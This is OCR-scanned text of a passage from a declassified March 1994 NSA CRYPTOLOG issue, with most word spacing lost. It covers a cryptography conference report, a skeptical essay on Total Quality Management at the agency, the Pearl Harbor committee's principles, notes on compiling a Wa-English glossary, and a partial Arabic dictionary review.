Research Centerandisworkingwiththeveryproduc­
tiveduoofTsutomo Matusmoto andHidekiImaiof
Yokohama University. Heisinterested inaspeedy
implementation oftheRSAscheme, andhasseized
uponsystolicarraystoimplement modular multiplica­
tion.Hesaysthatfora512-bitexponent eanda5l2-bit
modulus Ntheycanachieve50Kbpswithabout25K
gates.
(U)Theothertwotalksinthissessionalsodealt
withefficiency. YacovYacobiofBellcore (hiscoauthor
iscolleague MichaelBeller)isinterested inbatchpro­
cessing,andfoundthatBatch-RSA cannotbeemployed
effectively. Hewashappierwithhiseffortstoapply
batchprocessing inaDiffie-Hellman scenario, andthe
resultwas"BatchDiffie-Hellman keyagreement sys­
temsandtheirapplication toportablecommunications,"
whichusescomposite moduli.Unfortunately oneofthe
audience pointedoutaflawinoneofhisproofs;he
madeahand-waving recovery, buttheblunderhadbeen
clearlyestablished.
(U)KevinMcCurley andhisSandiacolleagues
ErnieBrickell, DanGordon(nowattheUniversity of
Georgia), andDavidWilson(nowatMIT)havebeen
optimizing theexponentiation operation, bothincon­
ventional groupsandinellipticcurvegroups("Fast
exponentiation withprecomputation"). Again,thissub­
jectisofundoubted importance (thoughitisperhapsnot
worthsqueezing outthelastepsilon,excepttohimwho
doesit)andthisisapowerful teamwhichcanbetrusted
todothejobwell.Iguessweascryptologists shouldbe
happytohavesuchtaskscarriedoutforus,freeingusto
thinkofourownproblems.
(U)Thenextfoursessionsweregivenovertophilo­
sophicalmatters. Complexity theorists arequitehappy
todefineconcepts andthentodiscussthemeventhough
theyhavenoexamples ofthem.JacquesPatarin(Bull,
France)wrestled withseveraloftheseatoncein"How
toconstruct pseudorandom andsuper-pseudorandom
permutations fromonesinglepseudorandom function,"
and,forthosewhoneededanotherdose,onecouldlisten
toBabekSadeghiyan (astudentofJosefPieprzyk atthe
University ofNewSouthWales,Australia) discuss
"Construction forsuper-pseudorandom permutations
fromasinglepseudorandom function," butthenexttime
Ihavetheoption,Iwillfindsomething elsetodo.(U)UeliMaurer(ETH,Zurich),in"Asimplified
generalized treatment ofLuby-Rackoff pseudorandom
permutation generators," triedtopersuade thephiloso­
phersthatinformation theorymayhavesomething to
sayabouttheirconcerns. Maurerisremarkably versa­
tile,andseemstobeabletocontribute substantially in
severalareas.
(U)DonBeaver(PennState),inanotherera,would
havebeenaspellbinding charismatic preacher; young,
dashing(hestillwearsapony-tail), self-confident and
glib,hehascaptured fromSilvioMicalitheleadership
ofthephilosophic wingoftheU.S.EastCoastcryptana­
lyticcommunity. Thesubtitletellsitallin"howto
breaka'secure'oblivious transferprotocol (or,good
definitions meaneverything)," inwhichhepatcheda
tinyholeinaprotocolofBertdenBoerwhichappeared
atlastyear'sEurocrypt.
(U)Beaver collaborated withStuartHaber
(Bellcore) toproduce"Cryptographic protocols proba­
blysecureagainstdynamic adversaries." Habergave
thistalk,butitwasnothisfinesthour.Inpasttalks,he
hasinjectedsomewelcome humor,butthisyearhejust
preached thegospel,eventhoughheconceded thatwhat
theyweredoinghadalsobeendoneafewyearsagoby
anMITgraduate studentnamedFeldman, butthatthey
"didn'tlikeFeldman's definitions."
(U)Theothertalkinthefirstcomplexity-theory ses­
sionwas"Uniform resultsinpolynomial-time security"
givenbytheveryyoungPaulBarbaroux (University of
Paris).Hefoundtimetopresentonlyaboutone-third of
histalk,whichwasprobably justaswell.
(U)Thoseofyouwhoknowmyprejudice against
the"zero-knowledge" wingofthephilosophical camp
willbesurprised tohearthatIenjoyedthethreetalksof
thesessionbetterthananyofthatilkthatIhadprevi­
ouslyendured. Thereasonissimple:Itookalongsome
interesting readingmaterial andignoredthespeakers.
Thattechnique servedtoadvantage againforthreemore
snoozers, Thursday's "digitalsignature andelectronic
cash" session, butthefinalsession,alsooncomplexity
theory,provided somesensiblelistening.
(U)Thefirsttalk,"Localrandomness incandidate
one-way functions," wasbytheamazing Austrian
HaraldNiederreiter (Austrian Academy ofScience),
representing workdonejointlywithClausSchnorr
(University ofFrankfurt). Niederreiter writesbeauti­
fullyandlecturesbeautifully too.Iquotefromtheir
paper"Amajoropenproblem incryptography isto
establish one-way functions. Whilewecannotprove
CONFIDENTIAL
18

DOCID: 4009689 CONFIBEN'FIAL
CRYPTOLOG
March 1994
one-wayness" [neithercananyoneelse-rek] "itmakes
sensetoanalyzecandidate one-way functions andto
proveproperties ofthesefunctions thatareusefulin
cryptographic applications." Youmightthinkthisstate­
mentwouldbeobvioustoall,butinmostcases,com­
plexitytheorists haveneverconcerned themselves with
actuallyfindingaone-way function! Niederreiter also
distanced himselffromcontemporary complexity theory
byannouncing thathisresultswoulddependonno
unproved hypotheses.
(U)NowIcannottellyouthattheveilhasbeen
lifted,andthatone-way functions arefinallyfully(or
evenpartially) understood. Butitisrefreshing tofinda
complexity theorytalkwhichactually addresses an
important problem! Forthisspecialoccasion, Iwould
reallyliketotellyouwhatIthinkhesaid,butunfortu­
natelyitwouldrequireastringofdefinitions justtoget
tothestatement ofthetwomainresults. OverZNhe
takesmlinearlyindependent (modulothelinearpolyno­
mials)polynomialsh,h, ...,fmandmapstheintegerx
inZNtothem-tupleformedfromtheleastsignificant bit
fromeachofthefunctions. Heproposes suchafunction
asacandidate one-wayfunction. Andofcoursethereis
theprospectoftakingmorethanoneleastsignificant bit
fromeachofthefunctions. Howeasyarethesefunc­
tionstoinvert?
(U)Theothertwotalksagainavoided anything of
substance. Tatsuaki Okamoto ofNTTGointauthors,
KoichiSakuraiofMutsubishi andHirokiShizuya of
TohomuUniversity), in"Howintractable isthediscrete
logarithm forageneralfinitegroup?"thoughtitworth­
while,indealingthegeneraldiscretelogarithm prob­
lem,toprovethattheproblem iscontained inthe
complexity classesNPandco-AM,butisunlikelytobe
inco-NP.(U)AndUeliMaurer,againdazzling uswithhis
brilliance, feltcompelled, in"Factoring withanOracle"
toarmhimselfwithanOracle(essentially anOmni­
scientBeingthatcomplexity theorists liketotumto
whentheycan'tsolveaproblem) whilefactoring. He's
calculating thetimeitwouldtakehim(andhisFriend)
tofactor,andwouldlikealsotodemonstrate hisinde­
pendence byconsulting hisPartnerasseldomaspossi­
ble.Thenexttimeyoufindyourselfsimilarlyequipped,
youwillperhapswanttorefertohispaper.
(U)Theconference againofferedaninteresting view
intothethoughtprocesses oftheworld'sleading"cryp­
tologists." Itisindeedremarkable howfartheAgency
hasstrayedfromtheTruePath.
(U)Hungary isabeautiful countrythathasfreed
itselffromanoppressive occupation whichlasted
almost45years.Fromatouristbrochure: "Hungarians
arenowdiligently learningEnglishandGermanandare
evenmore diligently forgetting Russian." Thepeople
sportAmerican T-shirtsbutspeaklittleEnglish; they
expecttouriststoconverse inGerman. Balatonfured is
inaresortareaaroundtheregion'slargestlake(Lake
Balaton). Accommodations aregenerally better,and
priceshigher,thanelsewhere inthecountry. MyHun­
garian-American wifeDonnaandIspentthreeweeksin
thecountryandexperienced reallywonderful weather:
sunshine everyday,coolnights(noneedforaircondi­
tioning!). Twentypercentofthe10millionpeoplelive
inBudapest, butthenextlargestcityisonlyone-tenth as
large.Theeconomy isbasically agranan; weobserved
extensive cultivation invirtually allofthecountryside
outsideofthecapital.
CONFIBEN'fIAL
19

DOCID: 4009689FOROFFICII ...LUS~O:NIX
~n~gnosticLootatcrQMCRVPTOLOG
March 1994
'Wi£[iam!M.!J{sJ{te,P054
Management techniques arelikeatoolbox.The
boxdoesnotcontainasinglemagictoolforeveryjob,
butanassortment oftoolsthatneedtobeselected
according tothejobathand.
TotalQualityManagement canbeaneffective set
oftools,offeringimpressive strengths: focusonthe
customer, empowerment ofemployees, actionbasedon
information, andcontinued improvement ofprocesses.
Thesestrengths haveledmanyorganizations toadopt
TQMtechniques; somehavegoneevenfurtherand
embraced thecultorreligionofTQM.Despitemy
respectforthepotential valueofTQM-truth betold-I
amanonbeliever, amanagement schoolagnostic. NSA
asaninstitution, however, hasbecomeaTQMbeliever,
bornagaininthegospelofDeming. Actually, giventhe
Agency's pastenthusiasm forothermanagement philos­
ophiesovertheyears,NSAcanperhaps bestbe
described asbornagain-and again-and again.
IsTQMausefultool?Absolutely, butonlyifwe
recognize itsweaknesses--even therisks-its incorpo­
rationentailsforNSA.Ifwefailtodoso,TQMnot
onlywillfailtoimprovetheagency's operational per­
formance, itwillhamperacriticalagency's abilityto
adapttoadifficultsetofchanged operating circum­
stancesandencourage athecynicism thatwillerodethe
moraleoftheagency's workforce.ThePrivateSector-Public SectorGap
Firstofall,wemustrecognize thatTQM,like
mostmanagement schemes, derivesfromaprivate-sec­
torexperience. Suchschemes inevitably translate only
roughlyintothepublicsector.Forexample, TQM's
focusonthecustomer isessential foranorganization
thatsometimes judgesitssuccessbyinternalmeasure­
ment:thatis,wethinkwedoagoodjob,sowemustbe
doingagoodjob.Butwhatistheexternalmeasurefora
public-sector organization? Private-sector organizations
ultimately cannotjudgetheirownsuccessorfailure.
Themarketperforms thisfunction, exceptofcourse
whereabusiness isamonopoly ornearmonopoly. Util­
itiesandregulated industries canevadethemarket,but
lookoutiftheylosetheirmonopolistic orregulated
niche.Wewillsuffer,aspublic-sector organizations
alwaysdo,fromtheabsenceofanalogous measures for
judgingsuccessorfailure.
Evenintheprivatesector,marketcircumstances
cancloudoratleastdelayatruemeasureofsuccessor
failure.TheAmerican automobile industryrepresented,
beforetheJapanese onslaught, something ofacollective
monopoly, withavirtually closedmarketandstart-up
coststooenormous toinvitenewplayersintothegame.
GM,Ford,andChrysler (alltheiradvertising notwith-
FOROFFICIAL USEONLY
20

DOCID: 4009689
CRYPTOLOG
March 1994FOROFFICI ...."LUS~ONL¥
standing) barelycompeted witheachother,ashistori­
callystablemarketshareswoulddemonstrate. Inthis
environment, atruemeasureofperformance (andqual­
ity)wasdifficulttomaintain. Withtheintroduction of
enormous numbersofJapanese cars,cheap,reliable,and
efficient, thetruemeasureofDetroit's inefficiency was
apparent. Chrysler almostdied,whileGMandFord
recorded trulyimpressive losses.
.L.86-36
Asavirtualmonopoly, NSAhasbeenlargely
sparedthecostofinadequate supporttoitscustomers or
lapsesinqualityofservicerendered. Wehavebeenper­
mittedtomeasuresuccessininternalterms:
Mostperversely, NSA,likeotherpublicsectororganiza­
tions,hasmeasured itssuccessnotinprofitorproduc­
tivitybutinexpenditure. Thebiggerthebudget,the
moresuccessful theagency.
TheFactory
Thesecondriskassociated withTQMisthatit
adoptsanindustrial metaphor. Thisisespecially unfor­
tunateforNSAwhichhastraditionally beenburdened
withsuchametaphor. Afterall,weproduce "prod­
uct"-not information, notaservice,butproduct. Orat
leastthat'swhatwe'vealwayssaid.
Wrong.We'reintheservicebusiness, theinfor­
mationservicebusiness, tobeexact,andoneofthefirst
thingsweneedtodotoremindourselves ofthisisto
dropallreferences to"product."
What'swrongwiththeproductmetaphor? Mostly
thatitconfuses themeasureofsuccess. Foryears,we
havegradedourperformance, atleastinpart,onthe
basisofhowmuchproductwehaveproduced. Ifthe
numberofproductsectionsrose,wemustbedoingwell.
Now,production statistics areusefulintheprivate
sectorbecausetheyhaveastrong,thoughnotunerring,
correlation withefficiency andmarketsavvy.Ifyou're
producing moreproduct,customers mustbedemanding
andbuyingmoreproduct. Buttheconnection between
demandandproduction ishazyatbestinthepublicsec­
tor.(Andeveninthesocialized privatesector.Admiral
ArleighBurkeusedtotellofvisitingaUKsubsidiary of
anAmerican autofirm.Outsideeachplant,Burkewas
horrified toseeacresandacresofcars."Howareyou
goingtosellthosecars?"Burkewouldask,onlytobe
toldthatsellingthemwaslessimportant thanmaking
them.Thegovernment, anxioustomaintain employ-mentlevels,wouldreimburse thecompany forunsel­
lablecars.ThisattitudehasbeensatirizedintheBritish
comedy"Yes,Minister;" abureaucrat rebukeshisminis­
terfordemanding results:"Wedonotmeasure success
byresults,butbyactivity.")
Weneedtoconcernourselves withsatisfying our
customers' needsforinformation. Insomecases,those
needsmayrequiremorereports.Inothers,thevolume
ofreportsmayoverwhelm thecustomer; then,the
properservicemightentailfewerreports. Thepointis
weneedtodisconnect qualityofservicefromnumberof
(ugh!)products. Theyareonlyroughlyrelated,ifatall.
Whilewe'reonthesubjectofjargon,weneedto
takealookatthetendency tospeakofcustomers'
"requirements" ratherthan"needs." Wegivethecus­
tomertheproductthey(saythey)require. Wemust
workondeveloping mechanisms togivethemwiththe
information theyneed,evenifthatmeansanticipating
thecustomer's senseofthoseneeds.
"Getting itRighttheFirstTime"
Another unfortunate industrial memory from
TQMisthisbusiness about"gettingitrightthefirst
time."Trueandappropriate forGM--once they've
enteredproduction. Butwhatalousyideathisisforan
organization thatneedstotailoritsservicetoanamaz­
ingrangeofcustomers whoseneedswillchangedra­
matically andunpredictably astheworldchanges..
TQMseemstobebestemployed asanexplicit
strategybycompanies operating inarelatively static
environment andconfronting significant repetitive pre­
cision,i.e.,industrial quality,problems. Itseemsless
attractive tofirmsthathavetoadjusttodeveloping real­
itiesor,evenmore,operating inenvironments sofluidit
makesnosensetoeventhinkaboutgettingitrightthe
firsttime.Theymaynotevenknowwhat"it"is.When
wasthelasttimeyousawBillGatesofMicrosoft emot­
ingabouthowhehascaughttheTQMspirit?More
likely,oneislikelytowatchRobertStempel, former
headofGM,talkingabouthiscommitment tothecon­
cept.BillGateshasmadebillionsforhimself,created
thousands ofjobs,andenriched hisstockholders. Stem­
pelmademillionsforhimselfwhiledisemploying thou­
sandsofworkersandcostinghisstockholders billions.
Nowthere'squality!
Anemphasis ongettingitrightthefirsttimealso
appearstocontradict theTQMpremises ofcontinuing
processimprovement andeliminating fearfromthe
FOROFFICIAL USEONLY
21

DOCID: 4009689"...DVI"lITI"U ........"'11•r1"''''''''''-'
March 1994FOROFFICfAL USEONIX
workplace. Inthefirstinstance, theveryideaofprocess
seemstocontradict thestasisimplicitingettingitright
everytime.Secondly, gettingitrighteverytimeseems
toassumethatoneisdealingwithvariables thatwill
reactwithuniformpredictability totheimposition ofa
givenprocedure. Shapingbodypanelsprobably reduces
itselftothis;dealingwithpeopledoesnot.
AttheMaster's Feet
(orOtherObsequious Positions)
MuchoftheTQMmythology leansheavilyona
grossmisreading ofthecareerofthelateW.Edwards
Deming. Deming: themanwhorebuiltJapanwhilehis
owncountryshamefully ignoredhim!
Firstofall,DemingdidnotrebuildJapan,theJap­
anesedid-aided bythegenerosity oftheUnitedStates.
Intheintricate matrixofethic,skill,andcapitalthat
togetherencourage industrialism, theeasiestcomponent
toreplaceiscapital.Itisalsotheonethatrequiresthe
mostfrequent replacement. Askilledpeople,awork
ethicintensified bythehardship ofwar,defeat,and
occupation, andarebuiltphysicalplantafterabout1960
virtually guaranteed Japansomemeasure ofsuccess.
DidDemingplayarole?Yes,buthelargelyreinforced
existingethicalandculturaltendencies. Hedidnotsup­
plythem,afactmadeclearbycomparing Japan'spost­
1945economic successwiththatofWestGermany.
WestGermany confronted thesamebasicsitua­
tionfacingJapan,askilledpeoplewithastrongachieve­
ment ethic, confronted bylackofcapitalandthe
destruction ofmuchofthecountry's physical plant.
LikeJapan,andinverysimilartime,Germany over­
cameitsdifficulties tobecome agreateconomic
power-despite, miracleofmiracles, theabsence of
Edwards Deming. Withoutquestion, Demingwasuse­
fultotheJapanese andhisrolecannotbeignored. But
Japan'seconomic emergence (reallyacontinuation ofa
processthathadbeguninthe19thCentury, onlytobe
interrupted bytheblunders ofJapan'smilitaryleader­
shipinthe1930sand1940s)wouldhavetakenplace
withouthim.
Mostimportantly, thegreatdangerofthemythof
Demingisthatitcontributes totheoverselling ofTQM,
especially throughtheevangelical qualityofthesales
pitchsometimes employed. Oneofthefilmsbeing
showntoagencyTQMclassesisaclassicofthegenre.
Abreathless "journalist," sothrilledtomerelybeinthe
presenceofDr.Demingshecanbarelyspeak,recounts
thatthousands ofexecutives "havetakenDeming toheart,"caughthisspirit,orotherwise experienced some
sortofconversion. Companies ofcoursemustbe
"totallycommitted" toTQMforittowork,explaining
why,despiteMr.Stempel's bestefforts,GMdidnotturn
aroundfaster:Mr.Goodwrench didn'tfeelthespirit.
Demingwasafascinating man,especially forhis
oftensubtle,oftenovertfascination withthespiritual
aspectsofwork.Hebelieved, forexample, thatthejob
ofamanager istoseethatemployees takejoyintheir
work.Achallenging concept? Yes.Anadmirable one?
Probably. Buttheconceptofjoyissosubjective andthe
sourcesofjoysodiverseandultimately individual, that
onecouldarguethatitissomething management cannot
ultimately provide. Maybeallajobcandoisofferthe
rewards-psychic andmaterial-that permitindividuals
topursuejoyintherestoftheirlives.
TheFallacyofTotalCommitment
Oneoftheproblems withTQMasfaithisembod­
iedintherepetition ofthemantra"totalcommitment."
Faithindeeddemands atotalcommitment. Onecan't
believeinjustninecommandments; faithintwopartsof
thetrinitywon'tcutit;andtheideathatthereisproba­
blyonlyoneGodandMohammed isoneofseveral,
equallyvalidmessengers isnotgoingtolightthefires.
Faithisanall-or-nothing proposition. Youbelieveor
youdon'tbelieve. Oryouremainagnostic.
Ifthisisthecase,whataretheDemingdisciples to
makeofhiscontention thatgood.ideasvirtually never
comefromwithinanorganization? Ifit'spartofthe
dogma,weareatgreatpainstoacceptit.Butforan
agencylikeNSA,rightlyifsometimes obsessively
closedtotheoutside,thisparticular doctrine means we
areinbigtrouble. Wegetonlyonetrulysignificant out­
siderintotheplaceeverythreeyearsorso,witharela­
tivelysmall,vitallyimportant, butstillinsufficient
infusionofoutsiders fromthemilitaryservices. Dowe
believeDeming? Ordoweconclude, onthisandother
issue,thatDemingisvaluablebutnotinfallible?
Ifweacceptthelatter,weneedmoveawayfrom
preaching TQMtoteaching TQM,andthatmeans
teachingitwartsandall.Management isnotafaithpro­
cess.Itisnotideology. Itisatechnique: eclectic,
applied,andparticular. Itiseclecticinthatmanytools
existformanydifferent tasks.Itisappliedinmuchthe
waythelateRonaldLewinsaidwartime intelligence
neededtobejudgedbyitsapplication: "Thebattleis
thepayoff." Inmanagement, performance isthepayoff
andthechoiceoftoolsisoftensecondary andsome­
timesacademic.
FOROFFICIAL USEONLY
22

DOCID: 4009689 FOROFFICIAL USoROMIl
CRYPTOLOG
March 1994
Management isparticular inthatmanagement
experiences transferonlyimperfectly fromoneorgani­
zationtoanother. WhatworksforMarriott mayfail
miserably forGeneralDynamics.
Byallmeans,letususeTQM.Letusputthecus­
tomersfirst,wheretheyshouldhavebeenallalong.Let
usempower ouremployees. Letusdevelop(anduse)
measures forjudgingprograms andsupporting deci­
sions.Andfinally,letusmakecontinuousimprovement
ofourprocesses anagency-wide commitment. Butlet's
stopworshipping ascrewdriver. That'snotevengood
religion;it'sidolatry. Ratherthandemanding totalcom­
mitment, effective management requires aconstant
skepticism. Isthetoolworking? Isittherighttool?
P.•L.86-36
Technical Literature Report
B~ IZ03
Ifyou'relookingforgoodarticlesonleadership, you
canfindonein(ofallplaces!)theAugust1992issueof
Computer Language magazine. Theauthor,LarryCon­
stantine, describes aninteresting Britishstudywith
someprovocative results.
ItseemsthataBritishstaffcollegewasconducting a
studyofleadership inhighachievers, soitassembled a
largegroupofcandidates andtestedthemforindividual
achievement. Thecandidates weresortedbyachieve­
mentlevel,thenregrouped. Thenewgroupsweretested
againandregrouped asecondtime.Thefinalgroups
rangedfrom"thebestofthebest"to"theworstofthe
worst." Thegroupswerethenassigned acollective
task,witheachonetobegradedonitsachievement asa
group.
Theresultswerenotwhattheresearchers expected.
Thegroupachievements borelittlerelationship tothe
individual achievements ofthegroupsmembers. In
fact,the"bestofthebest"groupdidmuchworsethan
"theworstoftheworst."Theimmediate question was
"Whatcouldpossiblyhavehappened?"
Onreflection, theanswerwassimple. Theinitial
testshadselectedthe"best"fromthe"worst"basedon
individual achievement; the"highachiever" selectees
hadfocus,energy,drive, and theabilitytogetthings
donebythemselves. Butthefinaltestwasbasedon
groupachievement, andthegroupsof"high"achievers
didn'tshowasmuchcreativity, flexibility, andco-opera­
tion-asgroups-as thegroupsof"low"achievers.Ultimately, managers mustbeprepared toadmit
theyhavebeenusingthewrongtoolandemploy
another-without fearingthattheywillbeaccusedof
heresyorinfidelity. Herewecrossfrommanagement to
leadership, recaIling whatthelateGraceHoppersaid:
"Youdon'tmanagepeople.Youmanagethings.You
leadpeople." AndNSA,likeotherorganizations is,in
thewordsofanotherfamousmanagement authority,
simplyacollection ofpeople-period!
Qualitymanagement isaneffective interimgoal
forNSA;butourrealobjective mustbequalityleader­
ship,consistent withourclaimtobetheworld'sleader
incryptology. TQM,ofitsown,willnotproducethis
objective.
Infact,inonecriticalrespect,the"lower"groups
hadamixofleadership. Someofthemembers were
drivers(although weakeronesthanwerefoundinthe
highergroups), butotherswereinnovators (leadersin
thinkingofnewideas),facilitators (leadersinresolving
conflicts between othermembers), andimplementers
(leadersindoingthedirtywork),amongothers.While
noneofthese"otherleaders"wasaseffective-as indi­
viduals-as themembers ofthe"higher" groups,the
"lower"groupshadpeoplewithleadership strengths in
eachofthespecificproblemareastheyfaced,sotheir
groupperformance wasbetteroverall.
Thelessonisclear.Tobuildahigh-achieving group,
weneedtolookfor-and appreciate-people whoare
different fromourselves. Theymaywellnotbeclassic
individual "highachievers"-in fact,pickingalluni­
formly"highachievers" maybethequickest wayto
disaster. Instead,weneedtopickamixofpeople,each
ofwhombringdifferent strengths tocomplement each
other'sweaknesses andcanworktogethertobuildthe
strongest teamoverall.
FOROFFICllJ:L USEONLY
23

DOCID~av.9rQP~6 89
....,....."".."......
March 1994FOltOFFICIAL USEONLY
Incommemoration ofWorldWarII,1941-1945
Principles forSuccessful Guidance
TheCongressional JointCommittee ontheInvestigation ofthePearlHarborAttack,afteritsthorough investigation
oftheattack,reachedtheconclusion thatcertainsupervisory, administrative, andorganizational deficiencies existed
inthearmedforcesoftheUnitedStatesandrecommended t/wtseriousconsideration begivenbytheArmyandNavy
totwenty-five principles whichitenunciated inthehopethatsomething constructive mightbeaccomplished that
wouldaidournational defenseandpreclude arepetition ofthefailureof7December 1941.Thetwenty-five
principles presented bythecongressional committee aresetforthbelow.
I.Operational andintelligence workrequirescentraliza­
tionofauthority andclear-cut allocation ofresponsibil­
ity.
IT.Supervisory officialcannotsafelytakeanything for
grantedinthealertingofsubordinates.
ill.Anydoubtastowhetheroutposts shouldbegiven
information shouldalwaysberesoived infavorofsup­
plyingtheinformation.
IV.Thedelegation ofauthority orissuance ororders
entailsthedutyofinspection todetermine thattheoffi­
cialmandate isproperlyexercised.
V.Theimplementation ofofficialordersmustbefol­
lowedwithclosestsupervision.
VI.Themaintenance ofalertness toresponsibility must
beinsuredthroughrepetition.
VII.Complacency andprocrastination areoutofplace
wheresuddenanddecisiveactionisoftheessence.
VITI.Thecoordination andproperevaluation ofintelli­
genceintimeofstressmustbeinsuredbycontinuity of
serviceandcentralization ofresponsibility incompetent
officials.
IX.Theunapproachable andsuperior attitudeofoffi­
cialsisfatal:Thereshouldneverbeanyhesitancy in
askingforclarification ofinstructions orinseeking
adviceonmattersthatareindoubt.
X.Thereisnosubstitute forimagination andresource­
fulnessonthepartofsupervisory andintelligence offi­
cials.
XI.Communications mustbecharacterized byclarity,
forthrightness, andappropriateness.
XU.Thereisgreatdangerincareless paraphrase of
information receivedandeveryeffortshouldbemadeto
insurethattheparaphrased material reflectsthetrue
meaning andsignificance oftheoriginal.XIII.Procedures mustbesufficiently flexibletomeet
theexigencies ofunusualsituations.
XIV.Restriction ofhighlyconfidential information toa
minimum numberofofficials, whileoftennecessary,
shouldnotbecarriedtothepointofprejudicing the
workoftheorganization.
XV.Thereisgreatdangerofbeingblindedbytheself­
evident.
XVI.Officials shouldatalltimesgivesubordinates the
benefitofsignificant information.
XVII.Anofficialwhoneglectstofamiliarize himselfin
detailwithhisorganization shouldforfeithisresponsi­
bility.
XVIII.Failurecanbeavoidedinthelongrunonlyby
preparation foranyeventuality.
XVIX. Officials, on apersonal basis,shouldnever
countermand anofficialinstruction. Personal andoffi­
cialjealousy willwreckanyorganization.
XXI.Personal friendship, withoutmore,shouldnever
beaccepted inlieuofliaisonorconfused therewith
wherethelatterisnecessary totheproperfunctioning of
twoormoreagencies.
XXII.Noconsideration shouldbepermitted asexcuse
forfailuretoperformafundamental task.
XXIII.Superiors mustatalltimeskeeptheirsubordi­
natesadequately informed, andconversely, subordinates
shouldkeeptheirsuperiors informed.
XXIV.Theadministrative organization ofanyestab­
lishment mustbedesigned tolocatefailuresandto
assessresponsibility.
XXv.Inawell-balanced organization thereisclosecor­
relationofresponsibility andauthority.
POROPFICIAL tfSEONLl
24

DOCID:4a096~BCRETfIIANDLE VIACOMtN'fJ CIIANNEL~ ONLT
P.L.86-36CRYPTOLOG
March 1994
Le;dcograpliy atSecondJfand:
Thoughts onProducing an"ExoticLanguage" Glossary
Ir631
E~CCO~TheformerDivision ofLanguages and
Linguistics (P16)wassometimes charged withcreating
an"exotic language" -English glossary, bytranslating
thecommon sideofan"exoticlanguage"-common lan­
guageglossary. Anexample istranslating theChinese
side(thecommon side)ofaWa-Chinese glossary to
produce aWa-English glossary. Waisofinterest
becauseitisspokenbyasmallgroupofpeopleactiveinsignificance performed afterthehunt.A"bloodmark"
thedrugtradewholiveinSoutheast Chinaandtheadja- ismadebyaWahunteronthestockofhiscrossbow in
centareaofBurma. thebloodofthebeastrecentlyslain,toboastofthehunt­
er'sprowess withthatweapon. Anndoisa"head
(U)Thismethodofproducing aglossary requires pole"-apoleonwhichtheseveredheadofanenemyis
muchlesstimeandfewerresources thandoesthepro-placed,whilenbinggaingisthespotinafieldwherethe
ductionofsuchaglossary fromscratch-but itdoespoleisplaced.(TheWaaresaidtohavebelievedthat
havesomepitfalls. Inthiscase,forinstance, theChi-placingaHanChineseheadateachofthefourcomers
neseteamthatgathered theWavocabulary andwrote ofafieldwouldguarantee agoodharvest.)
theglossesandexplanations wasbasedinYunnanprov-
ince.ThelocalYunnanese namesformanyofthecom- (U)Atanotherlevel,theabundance ofwordsrelat-
monplantsandwildanimals donotexistinanyingtooneareaoflifecontrasted tothepaucityofthose
published Standard Chinesedictionary. Sometimes, therelatingtootherscangiveaninsightintothecultureofa
Standard ChineseandYunnanese glossforthesame people.TheWahavecommon namesformanythings
character haddifferent meanings-leaving me,thethattheyconsider ediblethattheWestern doesnot-
translator oftheChinese, gropingforapropergloss. manyplantswhosetenderyoungleavesareedible-
TheChineseeditormusthavebeenalittlenear-sighted plantswhichwethinkofasonlyornamental orregardas
also,assomeofthecharacters hadelements thatdidn't weeds.Theglossaryevenlistsanedibletoad,unlessthe
fitthecontext,whichgavemefits,unfamiliar asIwasChinese havemistakenly usedthetoadcharacter to
withtheneworthography anyway. meanfrog,whichishighlyunlikely. Andwhatdowe
callthelumpoffleshonthetailofeachicken? TheWa
•(U)Tomakeupforthedifficulties encountered, Icallitbeed;itseemstobealogicalthingtohavenamed,
amusedmyselfbyreflecting onthelife-style observed sinceeverychickenhasone.
inexplanations ofsomeentries,andonthingslearned
throughthem.IntheWalanguage, Iranacrossideas (U)Themanygrassesthataredescribed asthatching
thatwereexpressed inunusualways,thatis,concepts material, andthedescriptions ofthatching methodsand
thatareforeigntosomeone whosefirstlanguage ispatterns, giveaninsightintowhatthetypicalWahouse
American English. Forinstance, thephraseaccompany- mightlooklike.Oneinteresting patternissaidtolook
ingtheglossfor"hiccup" was,"Don't'hiccup whileeat-likesawteethwhenseenfromtheinsideofthestructure.
ing;itwillupsetpeople." Howdoesonehiccup?
Thinking aboutthepossibility ofupsetting othersby (U)Theconsequences ofcarelessbehavior arounda
hiccuping whileeatingjustmightmakeonehiccup. lactree(atreerelatedtopoisonivyonwhichthelac
Andthephraseillustrating "goingtobed"contains thescaleisparasitic) arebroughtoutintheexplanation that
passage, "lieniqeandstraight, don'tcurlup."What achild'shandsareredandswollenbecause hewas
wouldpromptaparenttoadmonish achildwithsuchaclimbing andplayinginalactree.TheWawordfor"to
phrase? Isspacesorestricted inaWabedthatcurling carryinthemouth"isillustrated bythephrase,"thepan-
upisano-no? theriscarryingapigletinitsmouth." That,alongwith
severalotherreferences tolargecarnivores, givesalittle
(U)GoingfurtherafieldonecomesacrosstheWaoftheflavoroftheWaenvironment.
wordsmeaning"falseleopard" whichrequiretheexpla-
nationthat"falseleopard" isastructure ofbambooover (U)Takenalltogether, Ibelievethatthegainsfroma
whichtheskinoftheslainleopardisplacedandusedbyglanceintoanotherworldmorethanmakeupforthe
theWatorepresent aleopardinadancewithreligious difficulties metalongtheway.
25

DOCID: 4009689
I""rlIvn"'''1 ,,'"vnI.-1""'-"'''''
March 1994
BookReviewFOROFFICfAL USEONV'1
NewDictionary ofEnglish!ArabicScientific
andTechnical Terms
byAhmadSh.AI-Khatib, 6thed.1991
Reviewed byll.- _
(U)TheNewDictionary OfScientific andTechnical
TermsbyAhmadSh.AI-Khatib is,inmyopinion,one
ofthebesttechnical reference aidsthatnoArabiclin­
guistwhomustfunction inthescientific andte.chnical
Arabiclanguage arenashouldbewithout. Itis
unmatched inbreadthoftechnical termsaswellasdepth
ofanygiventerm.Thecomposition ofthedictionary as
wellasthedefinitions andillustrations arebasedon
westernscienceandengineering concepts, which shoul~
provethemostbeneficial totheeducated Western·
reader/researcher. Byandlarge,thisdictionary provides
definitions, butnotencyclopedic descriptions ofmany
ofitsterms.Insomecases,thereadermayhavetousea
morecomplete generalArabiclEnglish Dictionary, such
astheHansWehr,4thed.,ortheAI-Mawrid, togetthe
bestmeaningofaresearched word.
(U)I'vefoundthatthedefinitions aremostlygiven
inadherence tothetrueArabicroot,versusanEnglish­
sounding cognate, andtheauthorasbeenasfaithfulas
possible, whenpossible, tolinknewerconcepts ofsci­
enceandengineering totraditional Arabicroots.
(U)TheEnglishusedinthisdictionary ismoreBrit­
ishEnglishthanAmerican, butagain,wherepossible,
theauthorhastakencaretogiveboththeAmerican and
BritishtermforthesameArabicword.Forexample,
theArabicword"miftah" canbefoundastheBritish
term"spanner" andtheAmerican term"wrench"­
under"s"and"w"respectively. Bothofthesedefini­
